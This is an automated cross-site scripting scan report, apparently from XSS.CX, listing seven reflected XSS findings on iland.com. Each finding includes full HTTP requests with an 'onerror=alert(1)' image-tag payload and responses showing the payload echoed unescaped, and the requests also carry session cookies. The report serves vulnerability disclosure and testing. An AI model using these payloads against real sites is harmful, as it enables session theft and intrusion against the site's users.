Report generated by XSS.CX at Mon Nov 15 18:02:20 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. Cross-site scripting (reflected)

1.1. http://www.iland.com/products [REST URL parameter 1]

1.2. http://www.iland.com/products/server-cloud [REST URL parameter 1]

1.3. http://www.iland.com/products/server-cloud [REST URL parameter 2]

1.4. http://www.iland.com/sites/default/files/js/js_0e592cb65bf336756cfd6095fa68fa74.jsmin.js [REST URL parameter 1]

1.5. http://www.iland.com/sites/default/files/js/js_0e592cb65bf336756cfd6095fa68fa74.jsmin.js [REST URL parameter 2]

1.6. http://www.iland.com/sites/default/files/js/js_d1f4f3a905e25ad9bd4614e2ba5f865f.jsmin.js [REST URL parameter 1]

1.7. http://www.iland.com/sites/default/files/js/js_d1f4f3a905e25ad9bd4614e2ba5f865f.jsmin.js [REST URL parameter 2]



1. Cross-site scripting (reflected)
There are 7 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.iland.com/products [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iland.com
Path:   /products

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87848"><img%20src%3da%20onerror%3dalert(1)>51179033c11 was submitted in the REST URL parameter 1. This input was echoed as 87848"><img src=a onerror=alert(1)>51179033c11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /products87848"><img%20src%3da%20onerror%3dalert(1)>51179033c11?gclid=COfK6oP-o6UCFTRa7AodJVLSFw HTTP/1.1
Accept: */*
Referer: http://www.google.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.iland.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 23:36:33 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Set-Cookie: SESS2e25c85c7177587f5e71e8201eb26861=eea147a04b301620669743c2cb639c6a; expires=Thu, 09 Dec 2010 03:09:53 GMT; path=/; domain=.iland.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 23:36:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<body class="node articlepage products87848"><img src=a onerror=alert(1)>51179033c11">
...[SNIP]...

1.2. http://www.iland.com/products/server-cloud [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iland.com
Path:   /products/server-cloud

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 925e6"><img%20src%3da%20onerror%3dalert(1)>d8e8e7975a8 was submitted in the REST URL parameter 1. This input was echoed as 925e6"><img src=a onerror=alert(1)>d8e8e7975a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /products925e6"><img%20src%3da%20onerror%3dalert(1)>d8e8e7975a8/server-cloud HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.iland.com/products?gclid=COfK6oP-o6UCFTRa7AodJVLSFw
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.iland.com
Proxy-Connection: Keep-Alive
Cookie: SESS2e25c85c7177587f5e71e8201eb26861=21650e935059e25b2e180afc72b7dcfe; __utma=171035256.1632491316.1289864020.1289864020.1289864020.1; __utmb=171035256.1.10.1289864020; __utmc=171035256; __utmz=171035256.1289864020.1.1.utmgclid=COfK6oP-o6UCFTRa7AodJVLSFw|utmccn=(not%20set)|utmcmd=(not%20set); has_js=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 23:38:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 23:38:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<body class="node articlepage products925e6"><img src=a onerror=alert(1)>d8e8e7975a8 products925e6">
...[SNIP]...

1.3. http://www.iland.com/products/server-cloud [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iland.com
Path:   /products/server-cloud

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a336e"><img%20src%3da%20onerror%3dalert(1)>ac2952d4c3f was submitted in the REST URL parameter 2. This input was echoed as a336e"><img src=a onerror=alert(1)>ac2952d4c3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /products/server-clouda336e"><img%20src%3da%20onerror%3dalert(1)>ac2952d4c3f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.iland.com/products?gclid=COfK6oP-o6UCFTRa7AodJVLSFw
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.iland.com
Proxy-Connection: Keep-Alive
Cookie: SESS2e25c85c7177587f5e71e8201eb26861=21650e935059e25b2e180afc72b7dcfe; __utma=171035256.1632491316.1289864020.1289864020.1289864020.1; __utmb=171035256.1.10.1289864020; __utmc=171035256; __utmz=171035256.1289864020.1.1.utmgclid=COfK6oP-o6UCFTRa7AodJVLSFw|utmccn=(not%20set)|utmcmd=(not%20set); has_js=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 23:38:52 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 23:38:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<body class="node articlepage products products-server-clouda336e"><img src=a onerror=alert(1)>ac2952d4c3f">
...[SNIP]...

1.4. http://www.iland.com/sites/default/files/js/js_0e592cb65bf336756cfd6095fa68fa74.jsmin.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iland.com
Path:   /sites/default/files/js/js_0e592cb65bf336756cfd6095fa68fa74.jsmin.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 728ca"><img%20src%3da%20onerror%3dalert(1)>d927e2c0396 was submitted in the REST URL parameter 1. This input was echoed as 728ca"><img src=a onerror=alert(1)>d927e2c0396 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites728ca"><img%20src%3da%20onerror%3dalert(1)>d927e2c0396/default/files/js/js_0e592cb65bf336756cfd6095fa68fa74.jsmin.js HTTP/1.1
Accept: */*
Referer: http://www.iland.com/products?gclid=COfK6oP-o6UCFTRa7AodJVLSFw
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.iland.com
Proxy-Connection: Keep-Alive
Cookie: SESS2e25c85c7177587f5e71e8201eb26861=21650e935059e25b2e180afc72b7dcfe

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 23:36:37 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 23:36:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 20004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<body class="node articlepage sites728ca"><img src=a onerror=alert(1)>d927e2c0396 sites728ca">
...[SNIP]...

1.5. http://www.iland.com/sites/default/files/js/js_0e592cb65bf336756cfd6095fa68fa74.jsmin.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iland.com
Path:   /sites/default/files/js/js_0e592cb65bf336756cfd6095fa68fa74.jsmin.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe3a"><img%20src%3da%20onerror%3dalert(1)>650dd1011c5 was submitted in the REST URL parameter 2. This input was echoed as afe3a"><img src=a onerror=alert(1)>650dd1011c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/defaultafe3a"><img%20src%3da%20onerror%3dalert(1)>650dd1011c5/files/js/js_0e592cb65bf336756cfd6095fa68fa74.jsmin.js HTTP/1.1
Accept: */*
Referer: http://www.iland.com/products?gclid=COfK6oP-o6UCFTRa7AodJVLSFw
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.iland.com
Proxy-Connection: Keep-Alive
Cookie: SESS2e25c85c7177587f5e71e8201eb26861=21650e935059e25b2e180afc72b7dcfe

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 23:36:57 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 23:36:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<body class="node articlepage sites sites-defaultafe3a"><img src=a onerror=alert(1)>650dd1011c5">
...[SNIP]...

1.6. http://www.iland.com/sites/default/files/js/js_d1f4f3a905e25ad9bd4614e2ba5f865f.jsmin.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iland.com
Path:   /sites/default/files/js/js_d1f4f3a905e25ad9bd4614e2ba5f865f.jsmin.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8697"><img%20src%3da%20onerror%3dalert(1)>a10ad3fd09d was submitted in the REST URL parameter 1. This input was echoed as d8697"><img src=a onerror=alert(1)>a10ad3fd09d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesd8697"><img%20src%3da%20onerror%3dalert(1)>a10ad3fd09d/default/files/js/js_d1f4f3a905e25ad9bd4614e2ba5f865f.jsmin.js HTTP/1.1
Accept: */*
Referer: http://www.iland.com/products?gclid=COfK6oP-o6UCFTRa7AodJVLSFw
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.iland.com
Proxy-Connection: Keep-Alive
Cookie: SESS2e25c85c7177587f5e71e8201eb26861=21650e935059e25b2e180afc72b7dcfe

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 23:36:36 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 23:36:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 20004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<body class="node articlepage sitesd8697"><img src=a onerror=alert(1)>a10ad3fd09d sitesd8697">
...[SNIP]...

1.7. http://www.iland.com/sites/default/files/js/js_d1f4f3a905e25ad9bd4614e2ba5f865f.jsmin.js [REST URL parameter 2]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iland.com
Path:   /sites/default/files/js/js_d1f4f3a905e25ad9bd4614e2ba5f865f.jsmin.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1ccb"><img%20src%3da%20onerror%3dalert(1)>bd0085113b6 was submitted in the REST URL parameter 2. This input was echoed as e1ccb"><img src=a onerror=alert(1)>bd0085113b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/defaulte1ccb"><img%20src%3da%20onerror%3dalert(1)>bd0085113b6/files/js/js_d1f4f3a905e25ad9bd4614e2ba5f865f.jsmin.js HTTP/1.1
Accept: */*
Referer: http://www.iland.com/products?gclid=COfK6oP-o6UCFTRa7AodJVLSFw
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.iland.com
Proxy-Connection: Keep-Alive
Cookie: SESS2e25c85c7177587f5e71e8201eb26861=21650e935059e25b2e180afc72b7dcfe

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 23:36:57 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 23:36:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<body class="node articlepage sites sites-defaulte1ccb"><img src=a onerror=alert(1)>bd0085113b6">
...[SNIP]...

Report generated by XSS.CX at Mon Nov 15 18:02:20 CST 2010.